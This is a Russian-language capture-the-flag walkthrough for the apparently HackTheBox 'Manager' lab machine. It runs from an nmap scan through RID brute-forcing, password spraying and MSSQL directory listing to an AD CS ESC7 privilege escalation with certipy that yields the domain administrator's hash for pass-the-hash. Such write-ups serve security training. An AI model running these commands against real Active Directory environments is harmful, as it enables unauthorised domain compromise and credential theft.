Обзор сервисов
Машине присвоен IP-адрес 10.10.11.236. Проведем сканирование с помощью nmap:
$ nmap -sT -sC -Pn -oN nmap 10.10.11.236
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
|_ssl-date: 2023-10-22T02:25:17+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-date: 2023-10-22T02:24:43+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s
|_ssl-date: 2023-10-22T02:25:19+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-22T02:15:57
|_Not valid after: 2053-10-22T02:15:57
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-date: 2023-10-22T02:24:43+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2023-10-22T02:24:43
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Nmap done: 1 IP address (1 host up) scanned in 45.11 seconds
Добавим в /etc/hosts наши домены:
$ sudo nano /etc/hosts
10.10.11.236 manager.htb dc01.manager.htb
Веб-сервис
Сервис выглядит следующим образом:
Ничего интересного на веб-сервисе не обнаружили, вернемся сюда позже.
Domain Controller
Попробуем перебрать пользователей с помощью rid-brute и crackmapexec:
$ crackmapexec smb manager.htb -u anonymous -p "" --rid-brute
...
SMB manager.htb 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB manager.htb 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB manager.htb 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB manager.htb 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB manager.htb 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB manager.htb 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB manager.htb 445 DC01 1119: MANAGER\Operator (SidTypeUser)
Отсюда мы находим пользователей (запишем в файл users.txt):
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
Приведем список пользователей к нижнему регистру и запишем результат в файл passwords.txt.
Начнем перебирать пароли:
crackmapexec smb manager.htb -u users.txt -p passwords.txt
Таким образом, находим пароль от учетной записи Operator.
MSSQL
Пользователь Operator имеет доступ к MSSQL.
Находим в корне веб-сервера интересный файл с резервной копией.
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot\
subdirectory depth file
------------------------------- ----- ----
...
website-backup-27-07-23-old.zip 1 1
Скачаем и разархивируем этот файл. В файле .old-conf.xml обнаружим креды для пользователя raven:
$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>[email protected]</user>
<password>R********************3</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>
Повышение привилегий
Проверим сертификаты и права для их выпуска с помощью certipy:
$ certipy find -u [email protected] -p '...' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Saved BloodHound data to '20231022035038_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20231022035038_Certipy.txt'
[*] Saved JSON output to '20231022035038_Certipy.json'
Обнаруживаем потенциальное повышение привилегий через атаку ESC7 и пользователя Raven.
$ cat 20231022035038_Certipy.txt
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
...
Синхронизируем время с домен контроллером:
sudo apt-get install rdate
sudo rdate -n manager.htb
Атакуем по методичке:
$ certipy ca -ca 'manager-DC01-CA' -add-officer raven -username [email protected] -password '...' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
$ certipy ca -ca 'manager-DC01-CA' -username [email protected] -password '...' -dc-ip 10.10.11.236 -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
$ certipy req -username [email protected] -password '...' -ca 'manager-DC01-CA' -target 10.10.11.236 -template SubCA -upn [email protected]
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
$ certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username [email protected] -password '...'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
$ certipy req -username [email protected] -password '...' -ca 'manager-DC01-CA' -target 10.10.11.236 -retrieve 13
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
Теперь получаем TGT и вытаскиваем хеш для administrator:
$ certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': ...
С помощью psexec логинимся как administrator с помощью Pass-The-Hash:
Пользовательский флаг
Флаг суперпользователя
